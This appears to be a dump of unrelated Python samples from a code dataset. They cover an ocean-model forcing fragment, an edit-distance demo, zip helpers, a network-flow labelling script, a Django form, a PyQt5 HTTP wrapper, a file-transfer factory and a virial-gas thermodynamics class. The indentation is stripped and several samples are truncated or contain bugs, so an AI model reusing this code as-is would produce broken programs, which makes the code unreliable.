# MONTHLY PROFILES OF INORGANIC SUSPENDED MATTER
ISM1, ISM2 = np.empty(KB,dtype=float)
# MONTHLY PROFILES OF T & S
TCLIM1,TCLIM2 = np.empty(KB,dtype=float)
SCLIM1,SCLIM2 = np.empty(KB,dtype=float)
WCLIM1,WCLIM2 = np.empty(KB,dtype=float)
WEDDY1,WEDDY2,WEDDY3,WEDDY4 = np.empty(KB,dtype=float)
SLUX1, QCORR1, QCORR2 = Decimal()
# INTERPOLATORS AND COUNTERS
ICOUNTF, IDOUNTF, \
IFCHGE, IFDCHGE, \
IFDINT, IFINT = Decimal()
RATIOF, RATIOD = Decimal()
def FORCING_MANAGER():
from BFM17_POM1D_VrsFnl.src.BFM.General.ModuleGlobalMem import RLEN, ZERO, PI, ONE, NML_OPEN, NML_READ, error_msg_prn
from BFM17_POM1D_VrsFnl.src.BFM.General.ModuleConstants import SEC_PER_DAY
from BFM17_POM1D_VrsFnl.src.pom.phys.POMModule import IDIAGN, DTI, intt, RCP, KB, TF, SF, WUSURF, WVSURF, SWRAD, \
WTSURF, WSSURF, TSURF,SSURF, TB, SB
from BFM17_POM1D_VrsFnl.src.BFM.General.ModuleService import ISM, savef, PO4SURF, NO3SURF, NH4SURF, SIO4SURF, \
PO4BOTT, NO3BOTT, O2BOTT, PONBOTTgrad, WGEN, WEDDY, wind_input, radiance_input, ism_input, Sprofile_input, W_input, \
Tprofile_input, surfNut_input, bottNut_input, Sal_input, Temp_input, heat_input, surfaceS_input
import numpy as np
getcontext().prec = 12 # 12-digit precision (ilong)
# LOOP COUNTER
K = Decimal()
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# LOCAL ARRAYS
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
RLENGTH = Decimal()
# INITIALISATION AND FIRST FORCING READING
# if intt == int(ONE):
| StarcoderdataPython |
188053 | <filename>homoeditdistance/demonstration.py<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Usage demonstration for the homoeditdistance package."""
import sys
import argparse
from homoeditdistance import homoEditDistance, backtrack, assemblePaths
def get_parser():
"""
Returns the argument parser used to parse the command line used for invoking the demo application.
Used internally, exists solely for readability.
:return: The ArgumentParser.
"""
parser = argparse.ArgumentParser(description='Given two strings, find their homo-edit distance',
fromfile_prefix_chars='@')
parser.add_argument('-s', '--string1', required=True,
help='first string. Use quotation marks around your string (e.g. "STRING")'
'for the empty string or strings with special characters')
parser.add_argument('-t', '--string2', required=True,
help='second string')
parser.add_argument('-a', '--all', action='store_true', default=False, required=False,
help='show all optimal subsequences')
parser.add_argument('-b', '--backtrace', action='store_true', default=False, required=False,
help='print transformation steps')
return parser
def run(args):
"""
The main function of the
:param args: The arguments provided by the user and pre-parsed by our argument parser.
"""
s, t = args.string1, args.string2
requiredBacktrackLevel = 0
if args.backtrace:
requiredBacktrackLevel = 2
elif args.all:
requiredBacktrackLevel = 1
result = homoEditDistance(s, t, requiredBacktrackLevel)
print('The homo-edit distance between {} and {} is {}\n'.format(
s if s != '' else 'the empty string',
t if t != '' else 'the empty string',
result['hed']
)
)
if args.all and args.backtrace:
print('The following optimal subsequences were found, and obtained using the listed operations:')
subs = backtrack(result['bt'], s, t)
txt = dict(assemblePaths(result['bt'], s, t, result['zbt']))
for sup in set(subs):
print()
if sup == '':
print('empty string')
else:
print(sup)
print(txt[sup].strip())
elif args.all:
print('The following optimal subsequences were found:')
subs = backtrack(result['bt'], s, t)
for sup in set(subs):
print(sup, end=' ')
elif args.backtrace:
print('Detailed Backtracking for one possible subsequence:')
txt = dict(assemblePaths(result['bt'], s, t, result['zbt']))
key = next(iter(txt))
print(key)
print(txt[key])
def main():
"""Run the demo."""
run(get_parser().parse_args(sys.argv[1:]))
| StarcoderdataPython |
1741439 | import os
import zipfile
import shutil
import walk
def Unpack(set_pack, archive_name):
archive_name = set_pack[0] + "/" + archive_name
z = zipfile.ZipFile(archive_name, 'r')
z.extractall(set_pack[1])
z.close()
def Pack(set_pack, archive_name):
with zipfile.ZipFile(set_pack[0] + "/" + archive_name, 'w') as myzip:
myzip.write(set_pack[0] + "/") | StarcoderdataPython |
3372492 | <filename>datasets/data-sets/voice-assistant/annotate-data-flows.py<gh_stars>0
#!/usr/bin/env python3
import os
import sys
import json
arguments = len(sys.argv)
src_directory = "."
dst_directory = "../../annotated-data-sets/voice-assistant/"
# read all files in subdirectories
for root, dirs, files in os.walk(src_directory):
# Skip parent directories
if dirs:
continue
for file in files:
# open files in src and dst directories
with open(root+"/"+file,encoding="utf-8", mode="r") as flows, open(dst_directory+root[2:]+"/"+file,encoding="utf-8",mode="w+") as dst_file:
for flow in flows:
# anotate specific flows
fields = json.loads(flow)
try:
if fields["dp"] == 8009 and fields["da"] == "192.168.3.110":
fields["flow_type"] = "Local Client TCP Scan"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sa"] == "192.168.3.109" or fields["sa"] == "192.168.3.164":
fields["flow_type"] = "Local Client Communication"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == 67 and fields["dp"] == 68:
fields["flow_type"] = "DHCP"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == 68 and fields["dp"] == 67:
fields["flow_type"] = "DHCP (Partial)"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == 53:
fields["flow_type"] = "DNS (Google Services)"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == None and fields["dp"] == None and fields["da"].startswith("2"):
fields["flow_type"] = "Membership Report Group"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == None and fields["dp"] == None and not fields["da"].startswith("2"):
fields["flow_type"] = "ICMP"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == 5353 and fields["dp"] == 5353:
fields["flow_type"] = "MDNS"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["dp"] == 5228:
fields["flow_type"] = "TLS (Mtalk Service)"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == 5228:
fields["flow_type"] = "TLS (Mtalk Service - Missing TLS Connectivity Establishment)"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["dp"] == 443:
fields["flow_type"] = "TLS (Google Services)"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == 443:
fields["flow_type"] = "TLS (Google Services - Missing TLS Connectivity Establishment)"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["dp"] == 123:
fields["flow_type"] = "NTP"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["dp"] == 80:
fields["flow_type"] = "HTTP (Connectivity Check)"
json.dump(fields,dst_file)
print(file=dst_file)
elif fields["sp"] == 80:
fields["flow_type"] = "HTTP (Connectivity Check - Missing Flow Beginning)"
json.dump(fields,dst_file)
print(file=dst_file)
else:
fields["flow_type"] = "Unknown"
json.dump(fields,dst_file)
print(file=dst_file)
except Exception as e:
fields["flow_type"] = "Flow Error"
json.dump(fields,dst_file)
print(file=dst_file)
| StarcoderdataPython |
4819843 | from setuptools import setup
from setuptools import find_packages
setup(name='json-test',
packages = find_packages(),
version='0.1',
description='A python library for assisting you in writing tests against a JSON structure.',
url='https://github.com/inkmonk/json-test',
author='Sibi',
author_email='<EMAIL>',
license='BSD3',
zip_safe=False)
| StarcoderdataPython |
187293 | from osrf_pycommon.process_utils import asyncio
from osrf_pycommon.process_utils.async_execute_process import async_execute_process
from osrf_pycommon.process_utils import get_loop
# allow module to be importable for --cover-inclusive
try:
from osrf_pycommon.process_utils.async_execute_process_trollius import From
except ImportError:
TROLLIUS_FOUND = False
else:
TROLLIUS_FOUND = True
from osrf_pycommon.process_utils.async_execute_process_trollius import Return
from .impl_aep_protocol import create_protocol
loop = get_loop()
@asyncio.coroutine
def run(cmd, **kwargs):
transport, protocol = yield From(async_execute_process(
create_protocol(), cmd, **kwargs))
retcode = yield asyncio.From(protocol.complete)
raise Return(protocol.stdout_buffer, protocol.stderr_buffer,
retcode)
| StarcoderdataPython |
116022 | from django import forms
from .models import Job
class JobForm(forms.ModelForm):
class Meta:
model = Job
fields = ('publisher', 'company_name', 'title', 'job_type', 'location', 'description', 'post_until',
'is_active', 'apply_link')
widgets = {
'publisher': forms.TextInput(attrs={'class': 'form-control', 'value': '', 'id': 'currentUser',
'type': 'hidden'}),
'company_name': forms.TextInput(attrs={'class': 'form-control'}),
'title': forms.TextInput(attrs={'class': 'form-control'}),
'job_type': forms.Select(attrs={'class': 'form-control'}),
'location': forms.Select(attrs={'class': 'form-control'}),
'description': forms.Textarea(attrs={'class': 'form-control'}),
'post_until': forms.SelectDateWidget(attrs={'class': 'form-control'}),
'is_active': forms. CheckboxInput(attrs={'class': 'form-check-input'}),
'apply_link': forms.URLInput(attrs={'class': 'form-control'})
}
| StarcoderdataPython |
3249410 | <gh_stars>0
"""QHttp module."""
from PyQt5 import QtCore, QtNetwork
from typing import Union, Optional, cast, Dict, List, Any
from pineboolib.core import decorators
class QHttpRequest(object):
"""QHttpRequest class."""
_valid: bool
_major_ver: int
_minor_ver: int
_values: Dict[str, Any]
_id: int
ID: int = 0
def __init__(self):
"""Initialize."""
self._id = self.ID
print("* ID", self._id)
self.ID += 1
self._values = {}
self._major_ver = 1
self._minor_ver = 1
# self.setValue("Connection", "keep-alive")
def majorVersion(self) -> int:
"""Return major version."""
return self._major_ver
def minorVersion(self) -> int:
"""Return minor version."""
return self._minor_ver
def parse(self, text_: str) -> bool:
"""Parse text."""
list_: List[str] = []
pos = text_.find("\n")
if pos > 0 and text_[pos - 1] == "\r":
list_ = text_.strip().split("\r\n")
else:
list_ = text_.strip().split("\n")
if not list_:
return True
lines_: List[str] = []
for it in list_:
if it[0].isspace():
if lines_:
lines_[len(lines_) - 1] += " "
lines_[len(lines_) - 1] += it.strip()
else:
lines_.append(it)
for i in range(len(lines_)):
if not self.parseLine(lines_[i], i):
self._valid = False
return False
return True
def keys(self) -> str:
"""Return keys stringlist."""
return ",".join(list(self._values.keys()))
def setValue(self, key_: str, value_: Any):
"""Set key to dict."""
self._values[key_.lower()] = value_
def value(self, key_: str):
"""Return value."""
if key_.lower() in self._values.keys():
return self._values[key_.lower()]
raise ValueError("%s not found in values!" % key_)
def removeValue(self, key_: str):
"""Remove key from dict."""
k_ = key_.lower()
if k_ in self._values.keys():
self._values[k_] = None
del self._values[k_]
def setValid(self, valid_: bool) -> None:
"""Set if is valid."""
self._valid = valid_
def parseLine(self, line_: str, num_: int = 0) -> bool:
"""Parse line."""
if line_.find(":") == -1:
return False
else:
list_ = line_.split(":")
self._values[list_[0].lower()] = list_[1]
return True
def __str__(self):
"""Return string value."""
if not self._valid:
return ""
ret_ = ""
for k, v in self._values:
ret_ += "%s:%s\r\n" % (k, v)
return ret_
def hasContentLength(self):
"""Return if content length is avaliable."""
return "content-length" in self._values.keys()
def contentLenth(self) -> int:
"""Return content length."""
if "content-length" in self._values.keys():
return self._values["content-length"]
else:
return 0
def setContentLength(self, length_: int) -> None:
"""Set content length."""
self._values["content-length"] = length_
def hasContentType(self):
"""Return if has content type."""
return "content-type" in self._values.keys()
def contentType(self) -> str:
"""Return content type."""
if "content-type" in self._values.keys():
return self._values["content-type"]
else:
return ""
def setContentType(self, type_: str) -> None:
"""Set content type."""
self._values["content-type"] = type_
class QHttpResponseHeader(QHttpRequest):
"""QHttpRespnse class."""
_status_code: int
_reason_phr: Optional[str]
def __init__(self, *args):
"""Initialize."""
super().__init__()
self.setValid(False)
self._status_code = 0
self._reason_phr = ""
if len(args) > 1:
self._status_code = args[0]
self._reason_phr = args[1] or ""
if len(args) > 2:
self._major_ver = args[2]
if len(args) > 3:
self._minor_ver = args[3]
else:
self.parse(args[0])
def setStatusLine(self, code_: int, text_: Optional[str] = None, major_ver_=1, minor_ver_=1):
"""Set status line."""
self.setValid(True)
self._status_code = code_
self._reason_phr = text_
self._major_ver = major_ver_
self._minor_ver = minor_ver_
def statusCode(self) -> int:
"""Return status code."""
return self._status_code
def reasonPhrase(self) -> str:
"""Return reason."""
return self._reason_phr or ""
def parseLine(self, line_: str, number_: int = 0) -> bool:
"""Parse Line."""
if number_ != 0:
return super().parseLine(line_)
l_ = line_.strip()
if len(l_) < 10:
return False
if (
l_[0:5] == "HTTP/"
and l_[5].isdigit()
and l_[6] == "."
and l_[7].isdigit()
and l_[8] == "."
and l_[9].isdigit()
):
self._major_ver = int(l_[5]) - 0
self._minor_ver = int(l_[7]) - 0
pos = l_[9:].find(" ")
if pos > -1:
self._reason_phr = l_[9 + pos :]
self._status_code = int(l_[9 : 9 + pos])
else:
self._status_code = int(l_[9:])
self._reason_phr = ""
else:
return False
return True
def __str__(self):
"""Return str value."""
return "HTTP/%s.%s %s %s\r\n%s\r\n" % (
self._major_ver,
self._minor_ver,
self._status_code,
self._reason_phr,
str(super()),
)
class QHttpRequestHeader(QHttpRequest):
"""QHttpRequestHeader class."""
_method: str
_path: str
def __init__(self, *args):
"""Initialize."""
super().__init__()
self.setValid(False)
self._method = "POS"
if len(args) > 1:
self._method = args[0]
self._path = args[1]
if len(args) > 2:
self._major_ver: int = args[2]
if len(args) > 3:
self._minor_ver: int = args[3]
elif isinstance(args[0], str):
self.parse(args[0])
else:
self = args[0]
def setRequest(self, method_: str, path_: str, major_ver: int = 1, minor_ver=1):
"""Set request."""
self.setValid(True)
self._method = method_
self._path = path_
self._major_ver = major_ver
self._minor_ver = minor_ver
def method(self) -> str:
"""Return method."""
return self._method
def path(self) -> str:
"""Return path."""
return self._path
def __str__(self):
"""Return string value."""
return "%s %s HTTP/%s.%s\r\n%s\r\n" % (
self._method,
self._path,
self._major_ver,
self._minor_ver,
str(super()),
)
class HttpState(QtCore.QObject):
"""HttpState class."""
Unconnected = 0
HostLookup = 1
Connecting = 2
Sending = 3
Reading = 4
Connected = 5
Closing = 6
class HttpError(QtCore.QObject):
"""HttpError class."""
NoError = 0
UnknownError = 1
HostNotFound = 2
ConnectionRefused = 3
UnexpectedClose = 4
InvalidResponseHeader = 5
WrongContentLength = 6
Aborted = 7
class QHttp(HttpState, HttpError):
"""QHttp class."""
stateChanged = QtCore.pyqtSignal(int)
dataSendProgress = QtCore.pyqtSignal(int, int)
dataReadProgress = QtCore.pyqtSignal(int, int)
requestStarted = QtCore.pyqtSignal(int)
requestFinished = QtCore.pyqtSignal(int, bool)
responseHeaderReceived = QtCore.pyqtSignal(QHttpResponseHeader)
done = QtCore.pyqtSignal(bool)
readyRead = QtCore.pyqtSignal(QHttpResponseHeader)
_manager: QtNetwork.QNetworkAccessManager
_reply: QtNetwork.QNetworkReply
_state: int
_error: int
_host: str
_port: int
_name: str
_error_str: str
_parent: Optional[QtCore.QObject]
_operation: int
_data: Optional[QtCore.QBuffer]
_current_id: int
def __init__(self, *args):
"""Initialize."""
super().__init__()
self._state = self.Unconnected
self._error = self.NoError
self._data = None
if len(args) == 2:
self.initialize2(args[0], args[1])
elif len(args) == 4:
self.initialize1(args[0], args[1], args[2], args[3])
self._manager = QtNetwork.QNetworkAccessManager()
# self._request = QtNetwork.QNetworkRequest()
cast(QtCore.pyqtSignal, self._manager.finished).connect(self._slotNetworkFinished)
self._error_str = self.tr("Unknown error")
def initialize1(
self,
host_name: str,
port_: int = 80,
parent_: Optional[QtCore.QObject] = None,
name_: Optional[str] = None,
):
"""Initialize with kwars."""
self._host = "%s:%s" % (host_name, port_)
# self._port = port_
self._parent = parent_
self._name = name_ or ""
def initialize2(self, parent_: QtCore.QObject, name_: str = ""):
"""Initialize with args."""
self._parent = parent_
self._name = name_
def setHost(self, name_: str, port_: int = 80) -> None:
"""Set host."""
self._name = "%s:%s" % (name_, port_)
# self._port = port_
def get(self, full_path: str) -> None:
"""Get data from url."""
_request = QHttpRequestHeader("GET", full_path)
_request.setValue("Connection", "Keep-Alive")
self.request(_request)
# self._data = QtCore.QBuffer()
# _request = QtNetwork.QNetworkRequest()
# _request.setUrl(QtCore.QUrl(path_))
# self._state = self.Connecting
# self._reply = self._manager.get(_request)
# self._state = self.Connected
# cast(QtCore.pyqtSignal, self._reply.downloadProgress).connect(self._slotNetworkProgressRead)
def post(self, full_path: str, data_: Union[QtCore.QIODevice, QtCore.QByteArray]) -> None:
"""Send data to url."""
_request = QHttpRequestHeader("POST", full_path)
_request.setValue("Connection", "Keep-Alive")
self.request(_request, data_)
# self._data = QtCore.QBuffer()
# _request = QtNetwork.QNetworkRequest()
# _request.setUrl(QtCore.QUrl(path_))
# self._state = self.Connecting
# self._reply = self._manager.post(_request, data_)
# self._state = self.Connected
# cast(QtCore.pyqtSignal, self._reply.downloadProgress).connect(self._slotNetworkProgressRead)
@decorators.NotImplementedWarn
def head(self, path_: str) -> None:
"""Set head."""
return None
# header = QHttpRequestHeader("HEAD", path_)
# header.setValue("Connection", "Keep-Alive")
# return self.request()
def request(
self,
request_header: QHttpRequestHeader,
data_: Optional[Union[QtCore.QIODevice, QtCore.QByteArray]] = None,
buffer_: Optional[QtCore.QBuffer] = None,
) -> None:
"""Send request."""
self._data = None
del self._data
if buffer_ is None:
buffer_ = QtCore.QBuffer()
_request = QtNetwork.QNetworkRequest()
_tipo = request_header.method().lower()
# if request_header.hasContentType():
# _request.setHeader(
# QtNetwork.QNetworkRequest.ContentTypeHeader, request_header.contentType()
# )
url_ = QtCore.QUrl(request_header.path())
for k in request_header._values.keys():
if k != "host":
_request.setRawHeader(
str.encode(k), str.encode(str(request_header._values[k]).lower())
)
else:
url_ = QtCore.QUrl("%s/%s" % (request_header.value("host"), request_header.path()))
if not url_.isValid():
raise Exception("url_ is not a valid URL!")
_request.setUrl(url_)
method_ = getattr(self._manager, _tipo, None)
self._data = buffer_
if self._data is not None:
self._data.open(QtCore.QIODevice.ReadWrite)
self._state = self.Connecting
if _tipo == "get":
self._reply = method_(_request)
else:
self._reply = method_(_request, data_)
cast(QtCore.pyqtSignal, self._reply.downloadProgress).connect(self._slotNetworkProgressRead)
cast(QtCore.pyqtSignal, self._reply.uploadProgress).connect(self._slotNetworkProgressSend)
self._state = self.Connected
self._current_id = request_header._id
self.requestStarted.emit(request_header._id)
@decorators.NotImplementedWarn
def closeConnection(self) -> None:
"""Close Connection."""
self._state = self.Closing
self._reply.close()
def bytesAvalible(self) -> int:
"""Return bytes avalible."""
if self._data is not None:
return self._data.size()
else:
return self._reply.size()
@decorators.NotImplementedWarn
def readBlock(self, data_: str, max_length_: int) -> None:
"""Read block."""
pass
def readAll(self) -> QtCore.QByteArray:
"""Read all data."""
if self._data is not None:
return self._data.readAll()
else:
return self._reply.readAll()
def currentId(self) -> int:
"""Return id."""
return self._current_id
@decorators.NotImplementedWarn
def currentSourceDevice(self) -> QtCore.QIODevice:
"""Return current source device."""
pass
@decorators.NotImplementedWarn
def currentDestinationDevice(self) -> QtCore.QIODevice:
"""Return current destination device."""
pass
@decorators.NotImplementedWarn
def currentRequest(self) -> None:
"""Return current request."""
return None
@decorators.NotImplementedWarn
def hasPendingRequests(self) -> bool:
"""Return if pendidng reuqest exists."""
return True
@decorators.NotImplementedWarn
def clearPendingRequests(self) -> None:
"""Clear pending requests."""
pass
# for request_ in list(self._pending_request):
# self._pending_request.remove(request_)
def setState(self, state_: int) -> None:
"""Set state."""
self._state = state_
def state(self) -> int:
"""Return state."""
return self._state
def error(self) -> int:
"""Return error."""
return cast(int, self._reply.error())
def errorString(self) -> str:
"""Return error string."""
return self._reply.errorString()
def _slotNetworkFinished(self) -> None:
"""Send done signal."""
self._state = self.Closing
# sender = self.sender()
error_ = True
if self._error == self.NoError:
error_ = False
self.done.emit(error_)
self.requestFinished.emit(0, error_)
self._state = self.Unconnected
def _slotNetworkProgressRead(self, b_done: int, b_total: int) -> None:
"""Send done signal."""
if self._reply is None:
raise Exception("No reply in progress")
self._state = self.Reading
self.dataReadProgress.emit(b_done, b_total)
# self.dataSendProgress.emit(b_done, b_total)
if self._data is not None:
data_ = self._reply.readAll()
self._data.write(data_)
else:
self.readyRead.emit()
def _slotNetworkProgressSend(self, b_done: int, b_total: int) -> None:
"""Send done signal."""
if self._reply is None:
raise Exception("No reply in progress")
self._state = self.Sending
# self.dataReadProgress.emit(b_done, b_total)
self.dataSendProgress.emit(b_done, b_total)
if self._data is not None:
data_ = self._reply.readAll()
self._data.write(data_)
else:
self.readyRead.emit()
| StarcoderdataPython |
1704596 | <gh_stars>1-10
from transferfile.sftp import Sftp
from transferfile.scp import Scp
from transferfile.ftp import Ftp
from transferfile.rsync import Rsync
class TransferFactory(object):
@classmethod
def create(cls, type, host, username, password=None, port=None, **kwargs):
if type.lower() == "ftp":
return Ftp(host, username, password, port, **kwargs)
elif type.lower() == "scp":
return Scp(host, username, password, port, **kwargs)
elif type.lower() == "sftp":
return Sftp(host, username, password, port, **kwargs)
elif type.lower() == "rsync":
return Rsync(host, username, **kwargs)
else:
raise Exception(f"Unkonw transfer type: {type}")
| StarcoderdataPython |
123084 | # -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2019, 2020 <NAME> <<EMAIL>>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
__all__ = ['VirialCorrelationsPitzerCurl', 'VirialGas']
from fluids.numerics import newton
from chemicals.utils import log
from thermo.heat_capacity import HeatCapacityGas
from .phase import Phase
from chemicals.virial import BVirial_Pitzer_Curl, Z_from_virial_density_form
class VirialCorrelationsPitzerCurl(object):
def __init__(self, Tcs, Pcs, omegas):
self.Tcs = Tcs
self.Pcs = Pcs
self.omegas = omegas
self.N = len(Tcs)
def C_pures(self, T):
return [0.0]*self.N
def dC_dT_pures(self, T):
return [0.0]*self.N
def d2C_dT2_pures(self, T):
return [0.0]*self.N
def C_interactions(self, T):
N = self.N
Ciij = [[0.0]*N for i in range(N)]
Cijj = [[0.0]*N for i in range(N)]
# Full return should be (Ciij, Ciji, Cjii), (Cijj, Cjij, Cjji)
# but due to symmetry there is only those two matrices
return Ciij, Cijj
def dC_dT_interactions(self, T):
N = self.N
Ciij = [[0.0]*N for i in range(N)]
Cijj = [[0.0]*N for i in range(N)]
return Ciij, Cijj
def d2C_dT2_interactions(self, T):
N = self.N
Ciij = [[0.0]*N for i in range(N)]
Cijj = [[0.0]*N for i in range(N)]
return Ciij, Cijj
def B_pures(self, T):
Tcs, Pcs, omegas = self.Tcs, self.Pcs, self.omegas
return [BVirial_Pitzer_Curl(T, Tcs[i], Pcs[i], omegas[i]) for i in range(self.N)]
def dB_dT_pures(self, T):
Tcs, Pcs, omegas = self.Tcs, self.Pcs, self.omegas
return [BVirial_Pitzer_Curl(T, Tcs[i], Pcs[i], omegas[i], 1) for i in range(self.N)]
def B_interactions(self, T):
N = self.N
return [[0.0]*N for i in range(N)]
def dB_dT_interactions(self, T):
N = self.N
return [[0.0]*N for i in range(N)]
def B_matrix(self, T):
N = self.N
B_mat = [[0.0]*N for i in range(N)]
pures = self.B_pures(T)
B_interactions = self.B_interactions(T)
for i in range(N):
B_mat[i][i] = pures[i]
for i in range(N):
for j in range(i):
B_mat[i][j] = B_interactions[i][j]
B_mat[j][i] = B_interactions[j][i]
return B_mat
def dB_dT_matrix(self, T):
N = self.N
B_mat = [[0.0]*N for i in range(N)]
pures = self.dB_dT_pures(T)
B_interactions = self.dB_dT_interactions(T)
for i in range(N):
B_mat[i][i] = pures[i]
for i in range(N):
for j in range(i):
B_mat[i][j] = B_interactions[i][j]
B_mat[j][i] = B_interactions[j][i]
return B_mat
def d2B_dT2_pures(self, T):
Tcs, Pcs, omegas = self.Tcs, self.Pcs, self.omegas
return [BVirial_Pitzer_Curl(T, Tcs[i], Pcs[i], omegas[i], 2) for i in range(self.N)]
def d2B_dT2_interactions(self, T):
N = self.N
return [[0.0]*N for i in range(N)]
def d2B_dT2_matrix(self, T):
N = self.N
B_mat = [[0.0]*N for i in range(N)]
pures = self.d2B_dT2_pures(T)
B_interactions = self.d2B_dT2_interactions(T)
for i in range(N):
B_mat[i][i] = pures[i]
for i in range(N):
for j in range(i):
B_mat[i][j] = B_interactions[i][j]
B_mat[j][i] = B_interactions[j][i]
return B_mat
class VirialGas(Phase):
phase = 'g'
force_phase = 'g'
is_gas = True
is_liquid = False
ideal_gas_basis = True
pure_references = ('HeatCapacityGases',)
pure_reference_types = (HeatCapacityGas, )
def __init__(self, model, HeatCapacityGases=None, Hfs=None, Gfs=None,
T=None, P=None, zs=None):
self.model = model
self.HeatCapacityGases = HeatCapacityGases
self.Hfs = Hfs
self.Gfs = Gfs
if Hfs is not None and Gfs is not None and None not in Hfs and None not in Gfs:
self.Sfs = [(Hfi - Gfi)/298.15 for Hfi, Gfi in zip(Hfs, Gfs)]
else:
self.Sfs = None
for i in (zs, HeatCapacityGases, Hfs, Gfs):
if i is not None:
self.N = len(i)
break
if zs is not None:
self.zs = zs
if T is not None:
self.T = T
if P is not None:
self.P = P
if T is not None and P is not None and zs is not None:
Z = Z_from_virial_density_form(T, P, self.B(), self.C())
self._V = Z*self.R*T/P
def V(self):
return self._V
def dP_dT(self):
r'''
.. math::
\left(\frac{\partial P}{\partial T}\right)_{V} = \frac{R \left(T
\left(V \frac{d}{d T} B{\left(T \right)} + \frac{d}{d T} C{\left(T
\right)}\right) + V^{2} + V B{\left(T \right)} + C{\left(T \right)}
\right)}{V^{3}}
'''
try:
return self._dP_dT
except:
pass
T, V = self.T, self._V
self._dP_dT = dP_dT = self.R*(T*(V*self.dB_dT() + self.dC_dT()) + V*(V + self.B()) + self.C())/(V*V*V)
return dP_dT
def dP_dV(self):
r'''
.. math::
\left(\frac{\partial P}{\partial V}\right)_{T} =
- \frac{R T \left(V^{2} + 2 V B{\left(T \right)} + 3 C{\left(T
\right)}\right)}{V^{4}}
'''
try:
return self._dP_dV
except:
pass
T, V = self.T, self._V
self._dP_dV = dP_dV = -self.R*T*(V*V + 2.0*V*self.B() + 3.0*self.C())/(V*V*V*V)
return dP_dV
def d2P_dTdV(self):
r'''
.. math::
\left(\frac{\partial^2 P}{\partial V\partial T}\right)_{T} =
- \frac{R \left(2 T V \frac{d}{d T} B{\left(T \right)} + 3 T
\frac{d}{d T} C{\left(T \right)} + V^{2} + 2 V B{\left(T \right)}
+ 3 C{\left(T \right)}\right)}{V^{4}}
'''
try:
return self._d2P_dTdV
except:
pass
T, V = self.T, self._V
V2 = V*V
self._d2P_dTdV = d2P_dTdV = -self.R*(2.0*T*V*self.dB_dT() + 3.0*T*self.dC_dT()
+ V2 + 2.0*V*self.B() + 3.0*self.C())/(V2*V2)
return d2P_dTdV
def d2P_dV2(self):
r'''
.. math::
\left(\frac{\partial^2 P}{\partial V^2}\right)_{T} =
\frac{2 R T \left(V^{2} + 3 V B{\left(T \right)}
+ 6 C{\left(T \right)}\right)}{V^{5}}
'''
try:
return self._d2P_dV2
except:
pass
T, V = self.T, self._V
V2 = V*V
self._d2P_dV2 = d2P_dV2 = 2.0*self.R*T*(V2 + 3.0*V*self.B() + 6.0*self.C())/(V2*V2*V)
return d2P_dV2
def d2P_dT2(self):
r'''
.. math::
\left(\frac{\partial^2 P}{\partial T^2}\right)_{V} =
\frac{R \left(T \left(V \frac{d^{2}}{d T^{2}} B{\left(T \right)}
+ \frac{d^{2}}{d T^{2}} C{\left(T \right)}\right) + 2 V \frac{d}{d T}
B{\left(T \right)} + 2 \frac{d}{d T} C{\left(T \right)}\right)}{V^{3}}
'''
try:
return self._d2P_dT2
except:
pass
T, V = self.T, self._V
V2 = V*V
self._d2P_dT2 = d2P_dT2 = self.R*(T*(V*self.d2B_dT2() + self.d2C_dT2())
+ 2.0*V*self.dB_dT() + 2.0*self.dC_dT())/(V*V*V)
return d2P_dT2
def H_dep(self):
r'''
.. math::
H_{dep} = \frac{R T^{2} \left(2 V \frac{d}{d T} B{\left(T \right)}
+ \frac{d}{d T} C{\left(T \right)}\right)}{2 V^{2}} - R T \left(-1
+ \frac{V^{2} + V B{\left(T \right)} + C{\left(T \right)}}{V^{2}}
\right)
'''
'''
from sympy import *
Z, R, T, V, P = symbols('Z, R, T, V, P')
B, C = symbols('B, C', cls=Function)
base =Eq(P*V/(R*T), 1 + B(T)/V + C(T)/V**2)
P_sln = solve(base, P)[0]
Z = P_sln*V/(R*T)
# Two ways to compute H_dep
Hdep2 = R*T - P_sln*V + integrate(P_sln - T*diff(P_sln, T), (V, oo, V))
Hdep = -R*T*(Z-1) -integrate(diff(Z, T)/V, (V, oo, V))*R*T**2
'''
try:
return self._H_dep
except:
pass
T, V = self.T, self._V
V2 = V*V
RT = self.R*T
